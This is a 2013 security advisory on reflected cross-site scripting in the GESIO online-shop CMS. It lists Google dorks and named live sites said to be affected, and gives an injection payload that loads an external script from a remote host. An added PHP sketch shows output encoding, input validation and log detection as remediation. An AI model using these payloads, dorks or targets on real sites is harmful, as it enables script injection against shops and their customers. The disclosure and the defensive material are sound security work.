Tienda Online CMS Cross Site Scripting

2013-04-19T00:00:00
ID PACKETSTORM:121362
Type packetstorm
Reporter Ivan Sanchez
Modified 2013-04-19T00:00:00

Description

                                        
+=============================================================================================+  
+ Software Gestión GESIO & XSS & Allow Execute Evil Remote Code +  
+=============================================================================================+  
  
  
Author(s): Ivan Sanchez & Raul Diaz  
  
Product: Software Gestión GESIO   
Web: http://www.gesio.com/  
Versions: Modulo / Tienda Online - CMS  
Date: 18/04/2013  
  
Vendor Notified: 18/04   
Vendor Notified again: 19/04  
  
Extract:  
http://www.gesio.com/tienda-online-cms-89-50-431/  
"Your online shop connected to your daily invoicing. You will invoice with the same system you sell online with.  
At GESIO® we think an online management system should offer the possibility of developing an Online Shop"   
  
  
GOOGLE DORKS:  
------------  
  
allintext:POLÍTICA DE PROTECCIÓN DE DATOS -Software Gestión GESIO®  
  
inurl:cms/site_0003  
  
  
Sites affected   
--------------------  
  
ALL SITES USING THIS CMS  
  
http://www.qualitycenter.es/lp/  
http://www.greenhabit.es/lp/  
http://www.latiendadelhormigonimpreso.com/lp/  
http://www.minisub.es/lp/  
http://www.vitalarchery.com/lp/  
http://www.palacios-congresos-es.com/lcli/  
http://www.aulasconsoftware.com/lp/  
http://www.arthulencourt.eu/lp/  
http://www.soltercam.com/lp/  
http://www.sol-i-vent.es/lp/  
http://www.ale-hop.org/lp/  
http://creugal-hobby.com/lp/  
http://www.xipnet.es/lp/  
http://www.canterbury.es/lp/  
http://ociostock.com/lp/  
http://guatebloem.com/productos_listado.php  
  
and many more...  
  
Attacks >>>>>>>>>>>>>>>>>>>  
  
  
XSS & REMOTE INJECTION CODE:  
---------------------------  
  
'">><marquee><h1>EvilCode Team</h1></marquee>  
  
Or  
  
"><script src=http://nullcode.com.ar/code/scripts/EVIL.js></script> EXTERNAL EVIL CODE !  
  
  
Parameter Affected:  
-------------------  
  
--form 1 --  
  
http://www.sites/comunicados_listado.php?filtro_texto= INJECT HERE  
  
and much more...  
  
Remediation:  
------------  
  
Please validate the input and sanitize each parameter before it is echoed back into the page.  
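Added example, not GESIO's code and not part of the advisory: a minimal PHP sketch of a listing page that reflects the `filtro_texto` search parameter, shown once as the vulnerable string concatenation and once with context-correct output encoding, plus an allow-list validator and a small log check for spotting probing. Function names and the input value are hypothetical; the input value is the payload shape quoted above.

```php
<?php
// Added example (not GESIO's code): how a reflected search parameter such as
// filtro_texto reaches the HTML response, and the output-encoding fix the
// remediation above asks for. Function names are hypothetical.

// Vulnerable shape: the raw query value is concatenated straight into markup,
// so a quote or angle bracket in the value becomes part of the page structure.
function render_filter_vulnerable(string $filtro): string
{
    return '<input type="text" name="filtro_texto" value="' . $filtro . '">';
}

// Hardened shape: encode for the HTML attribute context at the moment of output.
// ENT_QUOTES covers both quote characters, which is what closes the attribute.
function render_filter_safe(string $filtro): string
{
    $encoded = htmlspecialchars($filtro, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="filtro_texto" value="' . $encoded . '">';
}

// Defence in depth: a free-text search filter can also be validated before it
// reaches the template. This allow-list keeps letters (including accented ones),
// digits, spaces and a little punctuation, and caps the length.
function validate_filter(string $filtro): bool
{
    if (strlen($filtro) > 100) {
        return false;
    }
    return preg_match('/^[\p{L}\p{N} .,_-]*$/u', $filtro) === 1;
}

// Detection aid for access logs: flag requests whose filtro_texto value
// contains markup characters, which a legitimate search term never needs.
function looks_like_xss_probe(string $filtro): bool
{
    return strpbrk($filtro, '<>"\'') !== false;
}

// Constructed input: the payload shape quoted in the advisory above.
$payload = '\'">><marquee><h1>EvilCode Team</h1></marquee>';

// Raw echo versus encoded echo of the same value.
echo render_filter_vulnerable($payload), PHP_EOL;
echo render_filter_safe($payload), PHP_EOL;

// Allow-list and log-check results for the probe and for an ordinary search term.
var_dump(validate_filter($payload));
var_dump(validate_filter('hormigón impreso'));
var_dump(looks_like_xss_probe($payload));
```

Encoding at the point of output is the change that actually closes the hole, because it is applied regardless of where the value came from; the allow-list and the log check are defence in depth and a cheap way to notice probing of `filtro_texto` in web server logs.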
  
  
Thank you so much!  
  
  
  
NULL CODE SERVICES [ www.evilcode.com.ar ] Hunting Security Bugs!  